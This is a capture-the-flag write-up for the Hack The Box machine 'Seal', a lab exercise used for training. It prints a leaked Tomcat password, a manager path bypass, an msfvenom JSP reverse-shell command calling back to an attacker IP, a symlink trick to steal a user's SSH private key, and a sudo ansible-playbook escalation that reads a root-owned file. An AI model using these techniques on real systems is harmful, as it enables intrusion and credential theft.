Information Gathering

NMAP

• command used: ( scanning for all the ports fast and efficient)

  sudo nmap -p- -sS --min-rate 5000 --open -T5 -vvv 10.10.10.250 -oG nmap/allPorts --defeat-rst-ratelimit 

• command used: ( scanning the ports we got )

  nmap -A -sC -sV -p22,443,8080 10.10.11.105 -Pn -oA nmap/full_scan

-> All ports scan:

Reason: 65529 resets and 3 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
443/tcp  open  https      syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

-> All ports scan with flags:

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
443/tcp  closed https
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Services

TCP 22 ( Default port for SSH )

-> SSH package version - Might be able to find the OS and version.
-> SSH key fingerprint - Has the key been re-used somewhere (Another machine? Same machine, just another port/service?)
-> SSH banner - Any text (if at all) before the password prompt (often get legal warnings about connecting to it)

-> SSH package version:

nc -vn 10.10.10.250 22

• output:

  └─$ nc -vn 10.10.10.250 22                                           
  (UNKNOWN) [10.10.10.250] 22 (ssh) open
  SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2

-> SSH key fingerprint:

ssh root@10.11.1.72

• output:

  └─$ ssh root@10.10.10.250                                                     
  The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.
  ECDSA key fingerprint is SHA256:YTRJC++A+0ww97kJGc5DWAsnI9iusyCE4Nt9fomhxdA.
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  Warning: Permanently added '10.10.10.250' (ECDSA) to the list of known hosts.

TCP 443 ( Default port for HTTPS )

-> Certificate:

-> Web Server:

curl -i https://10.10.10.250/ -k
HTTP/1.1 200 
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 05 Nov 2021 16:51:29 GMT
Content-Type: text/html
Content-Length: 19737
Connection: keep-alive
Accept-Ranges: bytes
ETag: W/"19737-1620221190102"
Last-Modified: Wed, 05 May 2021 13:26:30 GMT

<!DOCTYPE html>
<html lang="en">

<head>
  <!-- basic -->
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <!-- mobile metas -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="viewport" content="initial-scale=1, maximum-scale=1">
  <!-- site metas -->
  <title>Seal Market</title>

-> Directory Listing:

gobuster dir -u https://10.10.10.250/ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php -k

-> output:

─$ gobuster dir -u https://10.10.10.250/ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php -k                130 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.250/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/11/05 12:52:18 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 302) [Size: 0] [--> http://10.10.10.250/admin/]
/images               (Status: 302) [Size: 0] [--> http://10.10.10.250/images/]
/js                   (Status: 302) [Size: 0] [--> http://10.10.10.250/js/]    
/css                  (Status: 302) [Size: 0] [--> http://10.10.10.250/css/]   
/a                    (Status: 302) [Size: 0] [--> http://10.10.10.250/a/]     
/manager              (Status: 302) [Size: 0] [--> http://10.10.10.250/manager/]
/.                    (Status: 200) [Size: 19737]                               
/icon                 (Status: 302) [Size: 0] [--> http://10.10.10.250/icon/] 

We can see that after the gobuster scan we got a hit on /manager which means that could be a tomcat running in the background.
When we try to access the /manager we get redirected to /manager/html but it looks that it’s not working..We can try to access /manager/status and we can see that it’s working

PORT 8080 ( http-proxy - GitBucket )

We can see that on port 8080 it’s running a GitBucket instance.

-> Directory Listing:

wfuzz -u http://seal.htb:8080/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt --hw 0 
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                             
=====================================================================

000000025:   200        211 L    449 W      8982 Ch     "register"                                                          
000000570:   404        15 L     24 W       365 Ch      "WEB-INF"                                            
000000634:   200        142 L    311 W      6892 Ch     "signin"

Nothing interesting..Let’s try to create an account.
After creating the account and logging in we can see that we have access to 2 repositories

Checking seal_market we can see that it’s running tomcat and it’s a ToDo readme that we could check

That’s why we couldn’t access /manager/html normally..We will need to find a workaround for that.
We can try to find credentials for it in tomcat-users.xml but nothing is present here

By looking at the commits we can see that the user luis removed the credentials after uploading the tomcat setup.

tomcat:42MrHBf*z8{Z%

Now we can try to access the /manager/status

We can try to BYPASS the /manager/html by using /manager/status/..;/html

We can try to upload a war file in order to get a reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.95 LPORT=443 -f war > reverse.war

Browse for the war payload and intercept the request in Burp.

Modify the url and send the payload.

Privilege Escalation

Information Gathering ( Operating System )

tomcat@seal:/$ cat /etc/*-release  
DISTRIB_ID=Ubuntu  
DISTRIB_RELEASE=20.04  
DISTRIB_CODENAME=focal  
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"  
NAME="Ubuntu"  
VERSION="20.04.2 LTS (Focal Fossa)"  
ID=ubuntu  
ID_LIKE=debian  
PRETTY_NAME="Ubuntu 20.04.2 LTS"  
VERSION_ID="20.04"  
HOME_URL="https://www.ubuntu.com/"  
SUPPORT_URL="https://help.ubuntu.com/"  
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"  
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"  
VERSION_CODENAME=focal  
UBUNTU_CODENAME=focal

-> netstat:

tomcat@seal:/opt/backups/archives$ netstat -tulpn  
(Not all processes could be identified, non-owned process info  
 will not be shown, you would have to be root to see it all.)  
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                    
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -                    
tcp6       0      0 127.0.0.1:8000          :::*                    LISTEN      886/java              
tcp6       0      0 :::8080                 :::*                    LISTEN      -                    
tcp6       0      0 :::22                   :::*                    LISTEN      -                    
tcp6       0      0 :::443                  :::*                    LISTEN      -

Nothing interesting…Except the 8000 port but we will leave it for now.
After doing some manual enumeration, we can see that we have a .yml file in /opt/backups/

tomcat@seal:/opt/backups/playbook$ cat run.yml
- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/

So we can use this command in order to get the id_rsa from luis

ln -s ~/home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa

Copy it into /dev/shm or /tmp, rename it to backup.tar.gz and extract it via tar -xvf backup.tar.gz

Privilege Escalation

ESCALATION

Running sudo -l we can see that the user luis can run as any user with no-password the /usr/bin/ansible-playbook *

By checking it we can see that we can run ansible scripts
So in this case we can try to get the /root/root.txt flag because we know where is located.
https://link.zhihu.com/?target=https%3A//docs.ansible.com/ansible/latest/user_guide/playbooks.html

- name: Ansible Copy Example Local to Remote
  hosts: localhost
  tasks:
    - name: copying file with playbook
      become: true 
      copy:
        src: /root/root.txt
        dest: /dev/shm
        owner: luis
        group: luis        
        mode: 0777

And we can see we got the ROOT flag !